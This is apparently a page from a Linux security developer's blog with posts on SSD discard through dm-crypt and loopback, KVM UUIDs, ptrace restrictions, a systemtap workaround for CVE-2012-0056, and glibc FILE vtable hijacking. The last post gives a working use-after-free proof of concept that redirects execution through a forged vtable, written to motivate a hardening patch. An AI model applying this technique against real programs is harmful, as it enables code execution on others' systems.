Under Linux, there are a number of related features around marking areas of a file, filesystem, or block device as “no longer allocated”. In the standard view, here’s what happens if you fill a file to 500M and then truncate it to 100M, using the “truncate” syscall:

  1. create the empty file, filesystem allocates an inode, writes accounting details to block device.
  2. write data to file, filesystem allocates and fills data blocks, writes blocks to block device.
  3. truncate the file to a smaller size, filesystem updates accounting details and releases blocks, writes accounting details to block device.

The important thing to note here is that in step 3 the block device has no idea about the released data blocks. The original contents of the file are actually still on the device. (And to a certain extent is why programs like shred exist.) While the recoverability of such released data is a whole other issue, the main problem about this lack of information for the block device is that some devices (like SSDs) could use this information to their benefit to help with extending their life, etc. To support this, the “TRIM” set of commands were created so that a block device could be informed when blocks were released. Under Linux, this is handled by the block device driver, and what the filesystem can pass down is “discard” intent, which is translated into the needed TRIM commands.

So now, when discard notification is enabled for a filesystem (e.g. mount option “discard” for ext4), the earlier example looks like this:

  1. create the empty file, filesystem allocates an inode, writes accounting details to block device.
  2. write data to file, filesystem allocates and fills data blocks, writes blocks to block device.
  3. truncate the file to a smaller size, filesystem updates accounting details and releases blocks, writes accounting details and sends discard intent to block device.

While SSDs can use discard to do fancy SSD things, there’s another great use for discard, which is to restore sparseness to files. Normally, if you create a sparse file (open, seek to size, close), there was no way, after writing data to this file, to “punch a hole” back into it. The best that could be done was to just write zeros over the area, but that took up filesystem space. So, the ability to punch holes in files was added via the FALLOC_FL_PUNCH_HOLE option of fallocate. And when discard was enabled for a filesystem, these punched holes would get passed down to the block device as well.

Take, for example, a qemu/KVM VM running on a disk image that was built from a sparse file. While inside the VM instance, the disk appears to be 10G. Externally, it might only have actually allocated 600M, since those are the only blocks that had been allocated so far. In the instance, if you wrote 8G worth of temporary data, and then deleted it, the underlying sparse file would have ballooned by 8G and stayed ballooned. With discard and hole punching, it’s now possible for the filesystem in the VM to issue discards to the block driver, and then qemu could issue hole-punching requests to the sparse file backing the image, and all of that 8G would get freed again. The only down side is that each layer needs to correctly translate the requests into what the next layer needs.

With Linux 3.1, dm-crypt supports passing discards from the filesystem above down to the block device under it (though this has cryptographic risks, so it is disabled by default). With Linux 3.2, the loopback block driver supports receiving discards and passing them down as hole-punches. That means that a stack like this works now: ext4, on dm-crypt, on loopback of a sparse file, on ext4, on SSD. If a file is deleted at the top, it’ll pass all the way down, discarding allocated blocks all the way to the SSD:

Set up a sparse backing file, loopback mount it, and create a dm-crypt device (with “allow_discards”) on it:

# cd /root
# truncate -s10G test.block
# ls -lk test.block 
-rw-r--r-- 1 root root 10485760 Feb 15 12:36 test.block
# du -sk test.block
0       test.block
# DEV=$(losetup -f --show /root/test.block)
# echo $DEV
/dev/loop0
# SIZE=$(blockdev --getsz $DEV)
# echo $SIZE
20971520
# KEY=$(echo -n "my secret passphrase" | sha256sum | awk '{print $1}')
# echo $KEY
a7e845b0854294da9aa743b807cb67b19647c1195ea8120369f3d12c70468f29
# dmsetup create testenc --table "0 $SIZE crypt aes-cbc-essiv:sha256 $KEY 0 $DEV 0 1 allow_discards"

Now build an ext4 filesystem on it. This enables discard during mkfs, and disables lazy initialization so we can see the final size of the used space on the backing file without waiting for the background initialization at mount-time to finish, and mount it with the “discard” option:

# mkfs.ext4 -E discard,lazy_itable_init=0,lazy_journal_init=0 /dev/mapper/testenc
mke2fs 1.42-WIP (16-Oct-2011)
Discarding device blocks: done                            
Filesystem label=
OS type: Linux
Block size=4096 (log=2)
Fragment size=4096 (log=2)
Stride=0 blocks, Stripe width=0 blocks
655360 inodes, 2621440 blocks
131072 blocks (5.00%) reserved for the super user
First data block=0
Maximum filesystem blocks=2684354560
80 block groups
32768 blocks per group, 32768 fragments per group
8192 inodes per group
Superblock backups stored on blocks: 
        32768, 98304, 163840, 229376, 294912, 819200, 884736, 1605632

Allocating group tables: done                            
Writing inode tables: done                            
Creating journal (32768 blocks): done
Writing superblocks and filesystem accounting information: done 

# mount -o discard /dev/mapper/testenc /mnt
# sync; du -sk test.block
297708  test.block

Now, we create a 200M file, examine the backing file allocation, remove it, and compare the results:

# dd if=/dev/zero of=/mnt/blob bs=1M count=200
200+0 records in
200+0 records out
209715200 bytes (210 MB) copied, 9.92789 s, 21.1 MB/s
# sync; du -sk test.block
502524  test.block
# rm /mnt/blob
# sync; du -sk test.block
297720  test.block

Nearly all the space was reclaimed after the file was deleted. Yay!

Note that the Linux tmpfs filesystem does not yet support hole punching, so the exampe above wouldn’t work if you tried it in a tmpfs-backed filesystem (e.g. /tmp on many systems).

© 2012, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 4.0 License.
CC BY-SA 4.0

February 10, 2012

kvm and product_uuid

Filed under: Chrome OS,Debian,Ubuntu,Ubuntu-Server — kees @ 10:08 am

While looking for something to use as a system-unique fall-back when a TPM is not available, I looked at /sys/devices/virtual/dmi/id/product_uuid (same as dmidecode‘s “System Information / UUID”), but was disappointed when, under KVM, the file was missing (and running dmidecode crashes KVM *cough*). However, after a quick check, I noticed that KVM supports the “-uuid” option to set the value of /sys/devices/virtual/dmi/id/product_uuid. Looks like libvirt supports this under capabilities / host / uuid in the XML, too.

host# kvm -uuid 12345678-ABCD-1234-ABCD-1234567890AB ...
host# ssh localhost ...
...
guest# cat /sys/devices/virtual/dmi/id/product_uuid 
12345678-ABCD-1234-ABCD-1234567890AB

© 2012, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 4.0 License.
CC BY-SA 4.0

February 6, 2012

use of ptrace

Filed under: Blogging,Chrome OS,Security,Ubuntu,Ubuntu-Server — kees @ 4:48 pm

As I discussed last year, Ubuntu has been restricting the use of ptrace for a few releases now. I’m excited to see Fedora starting to introduce similar restrictions, but I’m disappointed at the specific implementation:

  • A method for doing this already exists (Yama). Yama is not plumbed into SELinux, but I would argue that’s not needed.
  • The SELinux method depends, unsurprisingly, on an active SELinux policy on the system, which isn’t everyone.
  • It’s not possible for regular developers (not system developers) to debug their own processes.
  • It will break all ptrace-based crash handlers (e.g. KDE, Firefox, Chrome) or tools that depend on ptrace to do their regular job (e.g. Wine, gdb, strace, ltrace).

Blocking ptrace blocks exactly one type of attack: credential extraction from a running process. In the face of a persistent attack, ultimately, anything running as the user can be trojaned, regardless of ptrace. Blocking ptrace, however, stalls the initial attack. At the moment an attacker arrives on a system, they cannot immediately extend their reach by examining the other processes (e.g. jumping down existing SSH connections, pulling passwords out of Firefox, etc). Some sensitive processes are already protected from this kind of thing because they are not “dumpable” (due to either specifically requesting this from prctl(PR_SET_DUMPABLE, ...) or due to a uid/gid transition), but many are open for abuse.

The primary “valid” use cases for ptrace are crash handlers, debuggers, and memory analysis tools. In each case, they have a single common element: the process being ptraced knows which process should have permission to attach to it. What Linux lacked was a way to declare these relationships, which is what Yama added. The use of SELinux policy, for example, isn’t sufficient because the permissions are too wide (e.g. giving gdb the ability to ptrace anything just means the attacker has to use gdb to do the job). Right now, due to the use of Yama in Ubuntu, all the mentioned tools have the awareness of how to programmatically declare the ptrace relationships at runtime with prctl(PR_SET_PTRACER, ...). I find it disappointing that Fedora won’t be using this to their advantage when it is available and well tested.

Even ChromeOS uses Yama now. ;)

© 2012, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 4.0 License.
CC BY-SA 4.0

January 22, 2012

fixing vulnerabilities with systemtap

Filed under: Blogging,Debian,Security,Ubuntu,Ubuntu-Server,Vulnerabilities — kees @ 3:22 pm

Recently the upstream Linux kernel released a fix for a serious security vulnerability (CVE-2012-0056) without coordinating with Linux distributions, leaving a window of vulnerability open for end users. Luckily:

  • it is only a serious issue in 2.6.39 and later (e.g. Ubuntu 11.10 Oneiric)
  • it is “only” local
  • it requires execute access to a setuid program that generates output

Still, it’s a cross-architecture local root escalation on most common installations. Don’t stop reading just because you don’t have a local user base — attackers can use this to elevate privileges from your user, or from the web server’s user, etc.

Since there is now a nearly-complete walk-through, the urgency for fixing this is higher. While you’re waiting for your distribution’s kernel update, you can use systemtap to change your kernel’s running behavior. RedHat suggested this, and here’s how to do it in Debian and Ubuntu:

  • Download the “am I vulnerable?” tool, either from RedHat (above), or a more correct version from Brad Spengler.
  • Check if you’re vulnerable:
    $ make correct_proc_mem_reproducer
    ...
    $ ./correct_proc_mem_reproducer
    vulnerable
    
  • Install the kernel debugging symbols (this is big — over 2G installed on Ubuntu) and systemtap:
    • Debian:
      # apt-get install -y systemtap linux-image-$(uname -r)-dbg
      
    • Ubuntu:
      • Add the debug package repository and key for your Ubuntu release:
        $ sudo apt-get install -y lsb-release
        $ echo "deb http://ddebs.ubuntu.com/ $(lsb_release -cs) main restricted universe multiverse" | \
              sudo tee -a /etc/apt/sources.list.d/ddebs.list
        $ sudo apt-key adv --keyserver keyserver.ubuntu.com --recv-keys ECDCAD72428D7C01
        $ sudo apt-get update
        
      • (This step does not work since the repository metadata isn’t updating correctly at the moment — see the next step for how to do this manually.) Install the debug symbols for the kernel and install systemtap:
        sudo apt-get install -y systemtap linux-image-$(uname -r)-dbgsym
        
      • (Manual version of the above, skip if the above works for you. Note that this has no integrity checking, etc.)
        $ sudo apt-get install -y systemtap dpkg-dev
        $ wget http://ddebs.ubuntu.com/pool/main/l/linux/$(dpkg -l linux-image-$(uname -r) | grep ^ii | awk '{print $2 "-dbgsym_" $3}' | tail -n1)_$(dpkg-architecture -qDEB_HOST_ARCH).ddeb
        $ sudo dpkg -i linux-image-$(uname -r)-dbgsym.ddeb
        
  • Create a systemtap script to block the mem_write function, and install it:
    $ cat > proc-pid-mem.stp <<'EOM'
    probe kernel.function("mem_write@fs/proc/base.c").call {
            $count = 0
    }
    EOM
    $ sudo stap -Fg proc-pid-mem.stp
    
  • Check that you’re no longer vulnerable (until the next reboot):
    $ ./correct_proc_mem_reproducer
    not vulnerable
    

In this case, the systemtap script is changing the argument containing the size of the write to zero bytes ($count = 0), which effectively closes this vulnerability.

UPDATE: here’s a systemtap script from Soren that doesn’t require the full debug symbols. Sneaky, put can be rather slow since it hooks all writes in the system. :)

© 2012, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 4.0 License.
CC BY-SA 4.0

December 22, 2011

abusing the FILE structure

Filed under: Blogging,Debian,Security,Ubuntu,Ubuntu-Server — kees @ 4:46 pm

When attacking a process, one interesting target on the heap is the FILE structure used with “stream functions” (fopen(), fread(), fclose(), etc) in glibc. Most of the FILE structure (struct _IO_FILE internally) is pointers to the various memory buffers used for the stream, flags, etc. What’s interesting is that this isn’t actually the entire structure. When a new FILE structure is allocated and its pointer returned from fopen(), glibc has actually allocated an internal structure called struct _IO_FILE_plus, which contains struct _IO_FILE and a pointer to struct _IO_jump_t, which in turn contains a list of pointers for all the functions attached to the FILE. This is its vtable, which, just like C++ vtables, is used whenever any stream function is called with the FILE. So on the heap, we have:

glibc FILE vtable location

In the face of use-after-free, heap overflows, or arbitrary memory write vulnerabilities, this vtable pointer is an interesting target, and, much like the pointers found in setjmp()/longjmp(), atexit(), etc, could be used to gain control of execution flow in a program. Some time ago, glibc introduced PTR_MANGLE/PTR_DEMANGLE to protect these latter functions, but until now hasn’t protected the FILE structure in the same way.

I’m hoping to change this, and have introduced a patch to use PTR_MANGLE on the vtable pointer. Hopefully I haven’t overlooked something, since I’d really like to see this get in. FILE structure usage is a fair bit more common than setjmp() and atexit() usage. :)

Here’s a quick exploit demonstration in a trivial use-after-free scenario:

#include <stdio.h>
#include <stdlib.h>

void pwn(void)
{
    printf("Dave, my mind is going.\n");
    fflush(stdout);
}

void * funcs[] = {
    NULL, // "extra word"
    NULL, // DUMMY
    exit, // finish
    NULL, // overflow
    NULL, // underflow
    NULL, // uflow
    NULL, // pbackfail
    NULL, // xsputn
    NULL, // xsgetn
    NULL, // seekoff
    NULL, // seekpos
    NULL, // setbuf
    NULL, // sync
    NULL, // doallocate
    NULL, // read
    NULL, // write
    NULL, // seek
    pwn,  // close
    NULL, // stat
    NULL, // showmanyc
    NULL, // imbue
};

int main(int argc, char * argv[])
{   
    FILE *fp;
    unsigned char *str;

    printf("sizeof(FILE): 0x%x\n", sizeof(FILE));

    /* Allocate and free enough for a FILE plus a pointer. */
    str = malloc(sizeof(FILE) + sizeof(void *));
    printf("freeing %p\n", str);
    free(str);

    /* Open a file, observe it ended up at previous location. */
    if (!(fp = fopen("/dev/null", "r"))) {
        perror("fopen");
        return 1;
    }
    printf("FILE got %p\n", fp);
    printf("_IO_jump_t @ %p is 0x%08lx\n",
           str + sizeof(FILE), *(unsigned long*)(str + sizeof(FILE)));

    /* Overwrite vtable pointer. */
    *(unsigned long*)(str + sizeof(FILE)) = (unsigned long)funcs;
    printf("_IO_jump_t @ %p now 0x%08lx\n",
           str + sizeof(FILE), *(unsigned long*)(str + sizeof(FILE)));

    /* Trigger call to pwn(). */
    fclose(fp);

    return 0;
}

Before the patch:

$ ./mini
sizeof(FILE): 0x94
freeing 0x9846008
FILE got 0x9846008
_IO_jump_t @ 0x984609c is 0xf7796aa0
_IO_jump_t @ 0x984609c now 0x0804a060
Dave, my mind is going.

After the patch:

$ ./mini
sizeof(FILE): 0x94
freeing 0x9846008
FILE got 0x9846008
_IO_jump_t @ 0x984609c is 0x3a4125f8
_IO_jump_t @ 0x984609c now 0x0804a060
Segmentation fault

Astute readers will note that this demonstration takes advantage of another characteristic of glibc, which is that its malloc system is unrandomized, allowing an attacker to be able to determine where various structures will end up in the heap relative to each other. I’d like to see this fixed too, but it’ll require more time to study. :)

Update: This specific patch was never taken upstream, but five years later, some vtable validation was added: Bugzilla, Commit.

© 2011 – 2022, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 4.0 License.
CC BY-SA 4.0

« Newer PostsOlder Posts »

Powered by WordPress